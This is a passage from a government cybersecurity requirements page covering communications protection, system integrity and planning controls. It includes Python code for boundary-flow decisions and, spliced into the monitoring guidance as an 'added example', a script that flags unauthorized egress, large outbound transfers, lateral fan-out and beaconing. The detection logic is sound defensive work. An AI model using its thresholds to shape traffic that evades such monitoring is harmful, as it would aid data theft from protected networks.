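        if is_organizational(dst):
            return "deny", "internal destination should not cross the boundary"
        if flow.dport in APPROVED_EGRESS_PORTS:
            return "allow", "approved egress service"
        return "deny", "egress port not in the approved exceptions"
    return "deny", "unknown direction"


def audit(flows: list[Flow]) -> list[str]:
    """Monitoring side of 03.13.01 a: one log line per flow with decision and reason."""
    lines = []
    for f in flows:
        verdict, reason = evaluate(f)
        lines.append(
            f"{verdict.upper():5} {f.direction:8} {f.src} -> {f.dst}:{f.dport}  ({reason})"
        )
    return lines


# Constructed sample flows: a legitimate visitor, a spoofed inbound packet,
# an attempt to reach an internal host directly, an unapproved inbound
# port, and three egress attempts (approved, spoofed, unapproved port).
SAMPLE_FLOWS = [
    Flow("inbound", "198.51.100.7", "192.0.2.10", 443),
    Flow("inbound", "10.1.2.3", "192.0.2.10", 443),
    Flow("inbound", "198.51.100.7", "10.0.0.5", 443),
    Flow("inbound", "198.51.100.7", "192.0.2.10", 22),
    Flow("outbound", "10.0.0.5", "198.51.100.1", 443),
    Flow("outbound", "203.0.113.9", "198.51.100.1", 443),
    Flow("outbound", "10.0.0.5", "198.51.100.1", 23),
]

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_FLOWS)))
```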
<details><summary><h4 id="03-13-04">03.13.04 Information in shared system resources</h4> </summary><p>Prevent unauthorized and unintended information transfer via shared system resources.</p> <h5>Discussion</h5> <p>Preventing unauthorized and unintended information transfer via shared system resources stops information produced by the actions of prior users or roles (or actions of processes acting on behalf of prior users or roles) from being available to current users or roles (or current processes acting on behalf of current users or roles) that obtain access to shared system resources after those resources have been released back to the system. Information in shared system resources also applies to encrypted representations of information. In other contexts, the control of information in shared system resources is referred to as object reuse and residual information protection. Information in shared system resources does not address information remanence, which refers to the residual representation of data that has been nominally deleted, covert channels (including storage and timing channels) in which shared system resources are manipulated to violate information flow restrictions, or components within systems for which there are only single users or roles.</p> <h5>References</h5> <p>Source control: SC-04<br /> Supporting publications: None</p> </details><h4 id="03-13-05">03.13.05 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-13-06">03.13.06 Network communications – deny by default – allow by exception</h4> </summary><p>Deny network communications traffic by default and allow network communications traffic by exception.</p> <h5>Discussion</h5> <p>This requirement applies to inbound and outbound network communications traffic at the system boundary and at identified points within the system. 
A deny-all, allow-by-exception network communications traffic policy ensures that only essential and approved connections are allowed.</p> <h5>References</h5> <p>Source control: SC-07(05)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/41/r1/final">NIST SP 800-41 Guidelines on Firewalls and Firewall Policy</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/77/r1/final">NIST SP 800-77 Guide to IPsec <abbr title="virtual private network">VPN</abbr>s</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/189/final">NIST SP 800-189 Resilient Interdomain Traffic Exchange: BGP Security and DDoS Mitigation</a></li> </ul></details><h4 id="03-13-07">03.13.07 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-13-08">03.13.08 Transmission and storage confidentiality</h4> </summary><p>Implement cryptographic mechanisms to prevent the unauthorized disclosure of specified information during transmission and while in storage.</p> <h5>Discussion</h5> <p>This requirement applies to internal and external networks and any system components that can transmit specified information, including servers, notebook computers, desktop computers, mobile devices, printers, copiers, scanners, facsimile machines, and radios. Unprotected communication paths are susceptible to interception and modification. Encryption protects specified information from unauthorized disclosure during transmission and while in storage. Cryptographic mechanisms that protect the confidentiality of specified information during transmission include <abbr title="Transport Layer Security">TLS</abbr> and IPsec. Information in storage (i.e., information at rest) refers to the state of specified information when it is not in process or in transit and resides on internal or external storage devices, storage area network devices, and databases. 
Protecting specified information in storage does not focus on the type of storage device or the frequency of access to that device but rather on the state of the information. This requirement relates to <a href="#03-13-11">Cryptographic protection 03.13.11</a>.</p> <h5>References</h5> <p>Source controls: SC-08, SC-08(01), SC-28, SC-28(01)<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cyber Centre Cryptographic Algorithms for UNCLASSIFIED, PROTECTED A, and PROTECTED B Information (ITSP.40.111)</a></li> <li><a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Cyber Centre Guidance on Securely Configuring Network Protocols (ITSP.40.062)</a></li> <li><a href="https://csrc.nist.gov/pubs/fips/140-3/final">NIST FIPS 140-3 Security Requirements for Cryptographic Modules</a></li> <li><a href="https://csrc.nist.gov/pubs/fips/197/final">NIST FIPS 197 Advanced Encryption Standard</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/46/r2/final">NIST SP 800-46 Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/52/r2/final">NIST SP 800-52 Guidelines for the Selection, Configuration, and Use of Transport Layer Security (TLS) Implementations</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/56/a/r3/final">NIST SP 800-56A Recommendation for Pair-Wise Key-Establishment Schemes Using Discrete Logarithm Cryptography</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/56/b/r2/final">NIST SP 800-56B Recommendation for Pair-Wise Key-Establishment Schemes Using Integer Factorization Cryptography</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/56/c/r2/final">NIST SP 800-56C Recommendation for Key-Derivation Methods in Key-Establishment Schemes</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/57/pt1/r5/final">NIST SP 800-57-1 Recommendation for 
Key Management: Part 1 – General</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/57/pt2/r1/final">NIST SP 800-57-2 Recommendation for Key Management: Part 2 – Best Practices for Key Management Organizations</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/57/pt3/r1/final">NIST SP 800-57-3 Recommendation for Key Management, Part 3: Application-Specific Key Management Guidance</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/77/r1/final">NIST SP 800-77 Guide to IPsec <abbr title="virtual private network">VPN</abbr>s</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/111/final">NIST SP 800-111 Guide to Storage Encryption Technologies for End User Devices</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/113/final">NIST SP 800-113 Guide to SSL <abbr title="virtual private network">VPN</abbr>s</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/114/r1/final">NIST SP 800-114 User’s Guide to Telework and Bring Your Own Device (BYOD) Security</a></li> <li><a href="/en/guidance/end-user-device-security-bring-your-own-device-byod-deployment-models-itsm70003">Cyber Centre End user device security for Bring-Your-Own-Device (BYOD) deployment models (ITSM.70.003)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/121/r2/upd1/final">NIST SP 800-121 Guide to Bluetooth Security</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/124/r2/final">NIST SP 800-124 Guidelines for Managing the Security of Mobile Devices in the Enterprise</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/177/r1/final">NIST SP 800-177 Trustworthy Email</a></li> </ul></details><details><summary><h4 id="03-13-09">03.13.09 Network disconnect</h4> </summary><p>Terminate network connections associated with communications sessions at the end of the sessions or after [Assignment: organization-defined time period] of inactivity.</p> <h5>Discussion</h5> <p>This requirement applies to internal and external networks. 
Terminating network connections associated with communications sessions includes deallocating <abbr title="Transmission Control Protocol/Internet Protocol">TCP/IP</abbr> addresses or port pairs at the operating system level or deallocating networking assignments at the application level if multiple application sessions are using a single network connection. Time periods of inactivity may be established by organizations and include time periods by type of network access or for specific network accesses.</p> <h5>References</h5> <p>Source control: SC-10<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-13-10">03.13.10 Cryptographic key establishment and management</h4> </summary><p>Establish and manage cryptographic keys in the system in accordance with the following key management requirements: [Assignment: organization-defined requirements for key generation, distribution, storage, access, and destruction].</p> <h5>Discussion</h5> <p>Cryptographic keys can be established and managed using either manual procedures or automated mechanisms supported by manual procedures. Organizations satisfy key establishment and management requirements in accordance with applicable federal laws, Orders in Council, policies, directives, regulations, and standards that specify appropriate options, levels, and parameters. 
This requirement is related to <a href="#03-13-11">Cryptographic protection 03.13.11</a>.</p> <h5>References</h5> <p>Source control: SC-12<br /> Supporting publications:</p> <ul><li><a href="https://www.cyber.gc.ca/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Cyber Centre Guidance on Securely Configuring Network Protocols (ITSP.40.062)</a></li> <li><a href="https://csrc.nist.gov/pubs/fips/140-3/final">NIST FIPS 140-3 Security Requirements for Cryptographic Modules</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/56/a/r3/final">NIST SP 800-56A Recommendation for Pair-Wise Key-Establishment Schemes Using Discrete Logarithm Cryptography</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/56/b/r2/final">NIST SP 800-56B Recommendation for Pair-Wise Key-Establishment Schemes Using Integer Factorization Cryptography</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/56/c/r2/final">NIST SP 800-56C Recommendation for Key-Derivation Methods in Key-Establishment Schemes</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/57/pt1/r5/final">NIST SP 800-57-1 Recommendation for Key Management: Part 1 – General</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/57/pt2/r1/final">NIST SP 800-57-2 Recommendation for Key Management: Part 2 – Best Practices for Key Management Organizations</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/57/pt3/r1/final">NIST SP 800-57-3 Recommendation for Key Management, Part 3: Application-Specific Key Management Guidance</a></li> </ul></details><details><summary><h4 id="03-13-11">03.13.11 Cryptographic protection</h4> </summary><p>Implement the following types of cryptography when used to protect the confidentiality of specified information: [Assignment: organization-defined types of cryptography].</p> <h5>Discussion</h5> <p>Cryptography is implemented in accordance with applicable laws, Orders in Council, directives, regulations, policies, standards, and guidelines. 
Federal information processing standard (FIPS)-validated cryptography is recommended for the protection of specified information.</p> <h5>References</h5> <p>Source control: SC-13<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/fips/140-3/final">NIST FIPS 140-3 Security Requirements for Cryptographic Modules</a></p> </details><details><summary><h4 id="03-13-12">03.13.12 Collaborative computing devices and applications</h4> </summary><ol class="lst-upr-alph"><li>Prohibit remote activation of collaborative computing devices and applications with the following exceptions: [Assignment: organization-defined exceptions where remote activation is to be allowed]</li> <li>Provide an explicit indication of use to users physically present at the devices</li> </ol><h5>Discussion</h5> <p>Collaborative computing devices include white boards, microphones, and cameras. Notebook computers, smartphones, display monitors, and tablets containing cameras and microphones are considered part of collaborative computing devices when conferencing software is in use. Indication of use includes notifying users (e.g., a pop-up menu stating that recording is in progress, or that the microphone has been turned on) when collaborative computing devices are activated. Dedicated video conferencing systems, which typically rely on one of the participants calling or connecting to the other party to activate the video conference, are excluded. 
Solutions to prevent device usage include webcam covers and buttons to disable microphones.</p> <h5>References</h5> <p>Source control: SC-15<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-13-13">03.13.13 Mobile code</h4> </summary><ol class="lst-upr-alph"><li>Define acceptable mobile code and mobile code technologies</li> <li>Authorize, monitor, and control the use of mobile code</li> </ol><h5>Discussion</h5> <p>Mobile code includes software programs or parts of programs that are obtained from remote systems, transmitted across a network, and executed on a local system without explicit installation or execution by the recipient. Decisions regarding the use of mobile code are based on the potential for the code to cause damage to the system if used maliciously. Mobile code technologies include Java applets, JavaScript, HTML5, VBScript, and WebGL. Usage restrictions and implementation guidelines apply to the selection and use of mobile code installed on servers and mobile code downloaded and executed on individual workstations and devices, including notebook computers, smart phones, and smart devices. 
Mobile code policies and procedures address the actions taken to prevent the development, acquisition, and use of unacceptable mobile code within the system, including requiring mobile code to be digitally signed by a trusted source.</p> <h5>References</h5> <p>Source control: SC-18<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/28/ver2/final">NIST SP 800-28 Guidelines on Active Content and Mobile Code</a></p> </details><h4 id="03-13-14">03.13.14 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-13-15">03.13.15 Session authenticity</h4> </summary><p>Protect the authenticity of communications sessions.</p> <h5>Discussion</h5> <p>Protecting session authenticity addresses communications protection at the session level, not at the packet level. Such protection establishes grounds for confidence at both ends of the communications sessions in the ongoing identities of other parties and the validity of the transmitted information. 
Authenticity protection includes protecting against adversary-in-the-middle attacks, session hijacking, and the insertion of false information into sessions.</p> <h5>References</h5> <p>Source control: SC-23<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Cyber Centre Guidance on Securely Configuring Network Protocols (ITSP.40.062)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/52/r2/final">NIST SP 800-52 Guidelines for the Selection, Configuration, and Use of Transport Layer Security (TLS) Implementations</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/77/r1/final">NIST SP 800-77 Guide to IPsec <abbr title="virtual private network">VPN</abbr>s</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/95/final">NIST SP 800-95 Guide to Secure Web Services</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/113/final">NIST SP 800-113 Guide to SSL <abbr title="virtual private network">VPN</abbr>s</a></li> </ul></details><h4 id="03-13-16">03.13.16 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> </section><section><h3 class="h2 mrgn-tp-lg" id="3-14">3.14 System and information integrity</h3> <p>The System and information integrity controls support the protection of the integrity of the system components and the data that it processes. 
They allow an organization to identify, report, and correct data and system flaws in a timely manner, to provide protection against malicious code, to monitor system security alerts and advisories, and to take appropriate actions in response.</p> <details><summary><h4 id="03-14-01">03.14.01 Flaw remediation</h4> </summary><ol class="lst-upr-alph"><li>Identify, report, and correct system flaws</li> <li>Install security-relevant software and firmware updates within [Assignment: organization-defined time period] of the release of the updates</li> </ol><h5>Discussion</h5> <p>Organizations identify systems that are affected by announced software and firmware flaws, including potential vulnerabilities that result from those flaws, and report this information to designated personnel with information security and privacy responsibilities. Security-relevant updates include patches, service packs, hot fixes, and anti-virus signatures. Organizations address the flaws discovered during security assessments, continuous monitoring, incident response activities, and system error handling. Organizations can take advantage of available resources (e.g., <abbr title="Common Weakness Enumeration">CWE</abbr> or <abbr title="Common Vulnerabilities and Exposures">CVE</abbr> databases) when remediating system flaws. 
Organization-defined time periods for updating security-relevant software and firmware may vary based on a variety of factors, including the criticality of the update (i.e., severity of the vulnerability related to the discovered flaw). Some types of flaw remediation may require more testing than other types.</p> <h5>References</h5> <p>Source control: SI-02<br /> Supporting publications:</p> <ul><li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li><a href="https://csrc.nist.gov/pubs/sp/800/40/r4/final">NIST SP 800-40 Guide to Enterprise Patch Management Planning: Preventive Maintenance for Technology </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems </a></li> </ul></details><details><summary><h4 id="03-14-02">03.14.02 Malicious code protection</h4> </summary><ol class="lst-upr-alph"><li>Implement malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code</li> <li>Update malicious code protection mechanisms as new releases are available in accordance with configuration management policies and procedures</li> <li>Configure malicious code protection mechanisms to: <ol><li>perform scans of the system [assignment: organization-defined frequency] and real-time scans of files from external sources at endpoints or system entry and exit points as the files are downloaded, opened, or executed</li> <li>block or quarantine malicious code, or take other mitigation actions in response to malicious code detection</li> </ol></li> </ol><h5>Discussion</h5> <p>Malicious code insertions occur through the exploitation of system vulnerabilities. Malicious code can be inserted into the system in a variety of ways, including email, the Internet, and portable storage devices. Malicious code includes viruses, worms, Trojan horses, and spyware. 
Malicious code can be encoded in various formats, contained in compressed or hidden files, or hidden in files using techniques such as steganography. Malicious code may be present in commercial off-the-shelf software and custom-built software and could include logic bombs, backdoors, and other types of attacks that could affect organizational mission and business functions. Periodic scans of the system and real-time scans of files from external sources as files are downloaded, opened, or executed can detect malicious code. Malicious code protection mechanisms can also monitor systems for anomalous or unexpected behaviours and take appropriate actions.</p> <p>Malicious code protection mechanisms include signature- and non-signature-based technologies. Non-signature-based detection mechanisms include artificial intelligence (AI) techniques that use heuristics to detect, analyze, and describe the characteristics or behaviour of malicious code. They also provide controls against such code for which signatures do not yet exist or for which existing signatures may not be effective. Malicious code for which active signatures do not yet exist or may be ineffective includes polymorphic malicious code (i.e., code that changes signatures when it replicates). Non-signature-based mechanisms include reputation-based technologies. Pervasive configuration management, anti-exploitation software, and software integrity controls may also be effective in preventing unauthorized code execution.</p> <p>If malicious code cannot be detected by detection methods or technologies, organizations can rely on secure coding practices, configuration management and control, trusted procurement processes, and monitoring practices to help ensure that the software only performs intended functions. Organizations may determine that different actions are warranted in response to the detection of malicious code. 
For example, organizations can define actions to be taken in response to the detection of malicious code during scans, malicious downloads, or malicious activity when attempting to open or execute files.</p> <h5>References</h5> <p>Source control: SI-03<br /> Supporting publications:</p> <ul><li><a href="https://www.cyber.gc.ca/en/guidance/protect-your-organization-malware-itsap00057">Cyber Centre Protect your organization from malware (ITSAP.00.057)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/spotting-malicious-email-messages-itsap00100">Cyber Centre Spotting malicious email messages (ITSAP.00.100)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/83/r1/final">NIST SP 800-83 Guide to Malware Incident Prevention and Handling for Desktops and Laptops</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/125/b/final">NIST SP 800-125B Secure Virtual Network Configuration for Virtual Machine (VM) Protection</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/177/r1/final">NIST SP 800-177 Trustworthy Email</a></li> </ul></details><details><summary><h4 id="03-14-03">03.14.03 Security alerts, advisories, and directives</h4> </summary><ol class="lst-upr-alph"><li>Receive system security alerts, advisories, and directives from external organizations on an ongoing basis</li> <li>Generate and disseminate internal system security alerts, advisories, and directives, as necessary</li> </ol><h5>Discussion</h5> <p>There are many publicly available sources of system security alerts and advisories. For example, the Canadian Centre for Cyber Security (Cyber Centre) generates security alerts and advisories to maintain situational awareness across the <abbr title="Government of Canada">GC</abbr> and in non-<abbr title="Government of Canada">GC</abbr> organizations. Software vendors, subscription services, and industry Information Sharing and Analysis Centres (ISACs) may also provide security alerts and advisories. 
Compliance with security directives is essential due to the critical nature of many of these directives and the potential immediate adverse effects on organizational operations and assets, individuals, other organizations, and Canada should the directives not be implemented in a timely manner.</p> <h5>References</h5> <p>Source control: SI-05<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/161/r1/final">NIST SP 800-161 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations</a></p> </details><h4 id="03-14-04">03.14.04 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-14-05">03.14.05 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-14-06">03.14.06 System monitoring</h4> </summary><ol class="lst-upr-alph"><li>Monitor the system to detect: <ol><li>attacks and indicators of potential attacks</li> <li>unauthorized connections</li> </ol></li> <li>Identify unauthorized use of the system</li> <li>Monitor inbound and outbound communications traffic to detect unusual or unauthorized activities or conditions</li> </ol><h5>Discussion</h5> <p>System monitoring involves external and internal monitoring. Internal monitoring includes the observation of events that occur within the system. External monitoring includes the observation of events that occur at the system boundary. Organizations can monitor the system by observing audit record activities in real time or by observing other system aspects, such as access patterns, characteristics of access, and other actions. 
The monitoring objectives may guide determination of the events.</p> <p>A system monitoring capability is achieved through a variety of tools and techniques (e.g., audit record monitoring software, intrusion detection systems, intrusion prevention systems, malicious code protection software, scanning tools, network monitoring software). Strategic locations for monitoring devices include selected perimeter locations and near server farms that support critical applications, with such devices employed at managed system interfaces. The granularity of the monitoring information collected is based on organizational monitoring objectives and the capability of the system to support such objectives.</p> <p>System connections can be network, remote, or local. A network connection is any connection with a device that communicates through a network (e.g., local area network, the Internet). A remote connection is any connection with a device that communicates through an external network (e.g., the Internet). Network, remote, and local connections can be either wired or wireless.</p> <p>Unusual or unauthorized activities or conditions related to inbound and outbound communications traffic include internal traffic that indicates the presence of malicious code in the system or propagating among system components, the unauthorized export of information, or signaling to external systems. Evidence of malicious code is used to identify a potentially compromised system. 
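The kinds of unusual or unauthorized traffic this discussion names can be turned into concrete checks. The following is an added example, not part of this guidance or any Cyber Centre tool: it runs an external-destination allowlist check, an outbound-volume check, an internal fan-out check and an interval-regularity (beaconing) check over constructed flow records; the 10.0.0.0/8 internal range, the allowlist, the record format and every threshold are assumptions an organization would set for itself.

```python
"""Checks for the 03.14.06 monitoring objectives over constructed flow records.
The record format, address ranges, allowlist and thresholds are assumptions."""
import ipaddress
from collections import defaultdict, namedtuple
from statistics import mean

INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")   # assumed enterprise range
# Assumed allowlist of authorized external destinations: ip -> permitted ports
AUTHORIZED_EXTERNAL = {"203.0.113.10": {443}}
EXPORT_BYTES = 50_000_000  # org-defined: outbound bytes per src/dst pair worth review
FANOUT_HOSTS = 5           # org-defined: distinct internal peers on one port
BEACON_COUNT = 4           # org-defined: minimum repeats before testing for beaconing
BEACON_JITTER = 0.10       # max deviation from the mean interval, as a fraction

# One flow record; bytes_out is the byte count sent by src to dst
Flow = namedtuple("Flow", "ts src dst dport bytes_out")

def parse_flow(line: str) -> Flow:
    """Parse one constructed record: '<epoch> <src> <dst> <dport> <bytes>'."""
    ts, src, dst, dport, nbytes = line.split()
    return Flow(int(ts), src, dst, int(dport), int(nbytes))

def is_internal(ip: str) -> bool:
    return ipaddress.ip_address(ip) in INTERNAL_NET

def unauthorized_external(flows):
    """Outbound flows to an external destination/port that is not on the allowlist."""
    hits = set()
    for f in flows:
        if is_internal(f.src) and not is_internal(f.dst):
            if f.dport not in AUTHORIZED_EXTERNAL.get(f.dst, set()):
                hits.add((f.src, f.dst, f.dport))
    return sorted(hits)

def possible_export(flows):
    """Internal->external pairs whose total outbound bytes exceed EXPORT_BYTES."""
    totals = defaultdict(int)
    for f in flows:
        if is_internal(f.src) and not is_internal(f.dst):
            totals[(f.src, f.dst)] += f.bytes_out
    return sorted(pair for pair, n in totals.items() if n > EXPORT_BYTES)

def lateral_fanout(flows):
    """Internal hosts reaching FANOUT_HOSTS or more distinct internal peers on one
    port, a pattern consistent with malicious code propagating among components."""
    peers = defaultdict(set)
    for f in flows:
        if is_internal(f.src) and is_internal(f.dst) and f.src != f.dst:
            peers[(f.src, f.dport)].add(f.dst)
    return sorted((src, port, len(d)) for (src, port), d in peers.items()
                  if len(d) >= FANOUT_HOSTS)

def beaconing(flows):
    """External destinations contacted repeatedly at a near-constant interval,
    the kind of signalling to external systems the discussion names."""
    times = defaultdict(list)
    for f in flows:
        if is_internal(f.src) and not is_internal(f.dst):
            times[(f.src, f.dst, f.dport)].append(f.ts)
    hits = []
    for key, ts in times.items():
        if len(ts) < BEACON_COUNT:
            continue
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        avg = mean(gaps)
        if avg > 0 and max(abs(g - avg) for g in gaps) <= BEACON_JITTER * avg:
            hits.append((*key, round(avg)))
    return sorted(hits)

def analyze(lines):
    """Run every check over raw record lines and return the findings per check."""
    flows = [parse_flow(ln) for ln in lines if ln.strip()]
    return {"unauthorized_external": unauthorized_external(flows),
            "possible_export": possible_export(flows),
            "lateral_fanout": lateral_fanout(flows),
            "beaconing": beaconing(flows)}

# Constructed sample: 10.0.0.0/8 hosts and documentation-range external addresses.
SAMPLE_LOG = """
1700000000 10.0.1.5 203.0.113.10 443 12000
1700000000 10.0.1.5 198.51.100.7 8443 300
1700000060 10.0.1.5 198.51.100.7 8443 310
1700000120 10.0.1.5 198.51.100.7 8443 305
1700000180 10.0.1.5 198.51.100.7 8443 298
1700000100 10.0.2.9 203.0.113.10 443 30000000
1700000400 10.0.2.9 203.0.113.10 443 30000000
1700000050 10.0.3.3 10.0.3.10 445 2000
1700000051 10.0.3.3 10.0.3.11 445 2000
1700000052 10.0.3.3 10.0.3.12 445 2000
1700000053 10.0.3.3 10.0.3.13 445 2000
1700000054 10.0.3.3 10.0.3.14 445 2000
1700000300 10.0.1.5 10.0.4.2 445 9000
""".strip().splitlines()

if __name__ == "__main__":
    for check, findings in analyze(SAMPLE_LOG).items():
        print(check, findings)
```

Each finding carries only the identifiers an analyst needs to pull the underlying records; a volume finding against an authorized destination (10.0.2.9 here) shows why the allowlist check and the volume check are kept separate.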
System monitoring requirements, including the need for types of system monitoring, may be referenced in other requirements.</p> <h5>References</h5> <p>Source controls: SI-04, SI-04(04)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/61/r2/final">NIST SP 800-61 Computer Security Incident Handling Guide</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/83/r1/final">NIST SP 800-83 Guide to Malware Incident Prevention and Handling for Desktops and Laptops</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/92/final">NIST SP 800-92 Guide to Computer Security Log Management</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/94/final">NIST SP 800-94 Guide to Intrusion Detection and Prevention Systems (IDPS)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/137/final">NIST SP 800-137 Information Security Continuous Monitoring (ISCM) for Federal Information Systems and Organizations</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/177/r1/final">NIST SP 800-177 Trustworthy Email</a></li> </ul></details><h4 id="03-14-07">03.14.07 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-14-08">03.14.08 Information management and retention</h4> </summary><p>Manage and retain specified information within the system and specified information output from the system in accordance with applicable laws, Orders in Council, directives, regulations, policies, standards, guidelines, and operational requirements.</p> <h5>Discussion</h5> <p>Federal departments and agencies consider data retention requirements for non-federal organizations. Retaining specified information on non-federal systems after contracts or agreements have concluded increases the attack surface for those systems and the risk of the information being compromised. 
Library and Archives Canada provides federal policy and guidance on records retention and schedules.</p> <h5>References</h5> <p>Source control: SI-12<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-14-09">03.14.09 Dedicated administration workstation</h4> </summary><ol class="lst-upr-alph"><li>Require any administrative or superuser actions to be performed from a physical workstation which is dedicated to those specific tasks and isolated from all other functions and networks, and especially from any form of internet access</li> <li>Remote connection of a <abbr title="dedicated administration workstation">DAW</abbr> to a target network is to use carrier private networks (e.g., virtual private LAN service (VPLS) or multiprotocol label switching (MPLS)) with <abbr title="virtual private network">VPN</abbr> encryption</li> <li>Use a dedicated and hardened single-purpose physical workstation or thin client as the <abbr title="dedicated administration workstation">DAW</abbr> that is not shared between security realms</li> </ol><h5>Discussion</h5> <p>A dedicated administration workstation (DAW) typically consists of a user terminal with a very small selection of software designed for interfacing with the target system. For the purpose of this control, workstation means the system from which you are performing the administration, as opposed to the target system of administration. The <abbr title="dedicated administration workstation">DAW</abbr> must be hardened for the role to minimize the likelihood that a superuser’s or administrator’s endpoint may be compromised by any threat actor (which would logically lead to the compromise of the target system). Typical office productivity tools are not required on the <abbr title="dedicated administration workstation">DAW</abbr>. All non-essential applications and services are removed. 
<abbr title="dedicated administration workstation">DAW</abbr>s are not domain-joined, cannot download patches from the internet, and cannot update documentation in networked applications.</p> <p>Removing public Internet access from administrative workstations substantially reduces the risk of compromise. Internet-exposed <abbr title="virtual private network">VPN</abbr> gateways are not preferred for remote administration; private carrier networks provide better protection, but still require <abbr title="virtual private network">VPN</abbr> encryption within that network. The <abbr title="dedicated administration workstation">DAW</abbr> must not become a means of moving laterally between security realms.</p> <h5>References</h5> <p>Source controls: SI-400, SI-400(02), SI-400(05)<br /> Supporting publications: None</p> </details></section><section><h3 class="h2 mrgn-tp-lg" id="3-15">3.15 Planning</h3> <p>The Planning controls and assurance activities deal with the development, documentation, update, and implementation of security and privacy plans for organizational systems. 
Those plans describe the security and privacy controls and assurance activities in place or planned for the systems, and the rules of behaviour for individuals accessing the systems.</p> <details><summary><h4 id="03-15-01">03.15.01 Policy and procedures</h4> </summary><ol class="lst-upr-alph"><li>Develop, document, and disseminate to organizational personnel or roles, policies and procedures needed to satisfy the security requirements for the protection of specified information</li> <li>Review and update policies and procedures [Assignment: organization-defined frequency]</li> </ol><h5>Discussion</h5> <p>This requirement addresses policies and procedures for the protection of specified information. Policies and procedures contribute to security assurance and should address each family of the specified information security requirements. Policies can be included as part of the organizational security policy or be represented by separate policies that address each family of requirements. Procedures describe how policies are implemented and can be directed at the individual or role that is the object of the procedure. 
Procedures can be documented in system security plans or in one or more separate documents.</p> <h5>References</h5> <p>Source controls: AC-01, AT-01, AU-01, CA-01, CM-01, IA-01, IR-01, MA-01, MP-01, PE-01, PL-01, PS-01, RA-01, SA-01, SC-01, SI-01, SR-01<br /> Supporting publications:</p> <ul><li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li><a href="https://csrc.nist.gov/pubs/sp/800/12/r1/final">NIST SP 800-12 An Introduction to Information Security</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/100/upd1/final">NIST SP 800-100 Information Security Handbook</a></li> </ul></details><details><summary><h4 id="03-15-02">03.15.02 System security plan</h4> </summary><ol class="lst-upr-alph"><li>Develop a system security and privacy plan that: <ol><li>defines the constituent system components</li> <li>identifies the information types processed, stored, and transmitted by the system</li> <li>describes specific threats to the system that are of concern to the organization</li> <li>describes the operational environment for the system and any dependencies on or connections to other systems or system components</li> <li>provides an overview of the security requirements for the 